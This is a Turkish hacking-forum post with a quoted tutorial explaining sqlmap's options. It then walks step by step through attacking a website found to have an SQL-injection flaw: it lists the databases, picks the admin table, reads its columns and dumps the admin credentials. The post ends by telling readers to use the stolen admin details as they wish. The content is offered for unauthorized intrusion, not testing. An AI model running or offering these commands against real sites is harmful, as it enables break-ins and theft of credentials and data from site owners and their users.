Sqlmap Nedir | Nasıl kullanılır?

fayrtek

fayrtek

Uzman üye
9 Nis 2021
1,173
386
23
İnternetin Derinliklerinde...
mitat1' Alıntı:

Sqlmap Nedir?


Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve kötüye kullanma
aracıdır. Hedefe ulaşmak için kullanılan web sunucularını kullanan arşiv birimleri çeşitli sorgular/komutlar ile sistem üzerindeki sql enjeksiyon tipini tespit eder yine de içerdiğini kullandığına göre çeşitli bilgileri hedef koleksiyonlarından alır.


2-Sqlmap Verileri ve Parametreleri
d5lvguu.png





Veritabanı türü ve versiyonu (–banner,–all) Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs) Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns) Veritabanı datası(–dump, –dump-all) Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users) Veritabanı kullanıcısının parolası (–passwords) Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba) Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f) URL (–url, -r ) Burp suite ve WebScarp proxy logu (–log , -l) HTTP taleplerinin bir dosyadan okunulması (–r) Google üzerinden URL toplayıp input olarak alabilmek(-g) /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)

fzxt3ew.jpeg


3-Sql map ile sql açıklı site hackleme

(root)Terminal'i açın sql açıklı site bulduktan sonra sıra db cekmede Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucaktır
sqlmap -u açıklı site --dbs
mf3xqtc.JPG

Gelen [y/N] sorularına y yazarak enterliyoruz.

k9iqrhq.PNG



Şimdi Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.


sqlmap -u açıklısite -D database adı --table

Gördüğünüz gibi tablolar önümüze geldi Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.
sqlmap -u açıklısite -D database adı -T admin --column

Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi id adı vs.) Kodu aşağıdaki gibi yazın.
sqlmap -u açıklısite -D database -T admin -C colunmlar --dump

NOT:BAZI KISIMLAR ALINTIDIR!!!

Admin Bilgileri elinizde dilediğiniz gibi kullanın,umarım faydalı olmuştur sağlıcakla kalın iyi günler

---YENİÇERİ Kulübü---

nw17pb1.jpeg

Genişletmek için tıkla ...
Elinize sağlık bende CMD den kullanıyorum :)
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.